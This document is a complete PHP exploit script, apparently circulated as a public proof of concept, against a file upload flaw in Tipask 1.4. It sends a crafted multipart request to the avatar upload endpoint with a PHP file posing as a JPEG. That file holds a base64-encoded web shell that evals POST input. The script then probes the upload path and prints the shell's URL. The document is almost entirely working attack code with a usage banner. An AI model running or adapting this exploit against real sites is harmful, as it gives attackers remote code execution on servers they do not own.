|
Exp:
<?
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
$host = rtrim(ltrim($argv[1],'http://'),'/');
$path = ereg_replace("(/){2,}", "/", $argv[2]);
//print $host;
print "\n+------------------------------------------------------------------+";
print "\n| |";
print "\n| __ __| _ \ _ \ | | |";
print "\n| | | | | | | __| __ \ _ \ __| |";
print "\n| | | | | | |\__ \ | | __/ | |";
print "\n| _| \___/ \___/ _|____/_)_| _|\___|\__| |";
print "\n| |";
print "\n| tipask1.4 File Upload Vulnerability |";
print "\n| |";
print "\n| |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /\n";
die();
}
exploit($host,$path);
$url=$host;
$ors=okor($host,$path);
if ($ors){
echo "[*] Shell:-> ".$url.$path."data/tmp/bigavatar0.php\n";
}else{
print "[-] No Bug!\n";
}
function exploit($host,$path){
$shellcode='PD9waHAgZXZhbCgkX1BPU1RbbG9zdHdvbGZdKT8+';
$file=base64_decode($shellcode);
//print $file;
$postdata ="\r\n";
$postdata .="--xndrotxfbsejfrpdhhivrwqkpxrnsdxc\r\n";
$postdata .="Content-Disposition: form-data; name=\"PHPSESSID\"\r\n";
$postdata .="\r\n";
$postdata .="1\r\n";
$postdata .="--xndrotxfbsejfrpdhhivrwqkpxrnsdxc\r\n";
$postdata .="Content-Disposition: form-data; name=\"Filedata\"; filename=\"1.php\"\r\n";
$postdata .="Content-Type: image/jpeg\r\n";
$postdata .="\r\n";
$postdata .=$file."\r\n";
$postdata .="--xndrotxfbsejfrpdhhivrwqkpxrnsdxc--\r\n";
$payload = "POST {$path}/?user/editimg.html HTTP/1.1\r\n";
$payload .="Host: $host\r\n";
$payload .="User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1\r\n";
$payload .="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$payload .="Accept-Language: zh-cn,zh;q=0.5\r\n";
$payload .="Accept-Encoding: gzip, deflate\r\n";
$payload .="Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$payload .="Keep-Alive: 115\r\n";
$payload .="Proxy-Connection: keep-alive\r\n";
$payload .="Referer: $host/css/common/swfupload.swf?preventswfcaching=1321556724903\r\n";
$payload .="Content-type: multipart/form-data; boundary=xndrotxfbsejfrpdhhivrwqkpxrnsdxc\r\n";
$payload .="Content-Length: 290 \r\n";
$payload.=$postdata;
print $payload;
$ock=fsockopen($host,80);
if (!$ock) {
echo "[*] No response from $host\n";
}
fwrite($ock,$payload);
while (!feof($ock)) {
//print $payload;
$exp=fgets($ock, 1024);
return $exp;
print $postdata;
}
}
function okor($host,$path){
$tmp = array();
$data = '';
$fp = @fsockopen($host,80,$errno,$errstr,60);
@fputs($fp,"GET {$path}/data/tmp/bigavatar0.php HTTP/1.1\r\nHost:$host\r\nConnection: Close\r\n\r\n");
while ($fp && !feof($fp))
$data .= fread($fp, 102400);
@fclose($fp);
if (strpos($data, '200') !== false) {
return true;
}else{
return false;
}
}
?> |